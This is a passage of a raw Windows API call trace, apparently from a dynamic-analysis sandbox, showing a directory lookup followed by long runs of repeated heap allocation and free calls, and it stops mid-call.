HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0188.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0188.467] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 1 [0188.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0188.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0188.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0188.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0 [0188.468] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0188.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0188.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.469] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0188.469] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 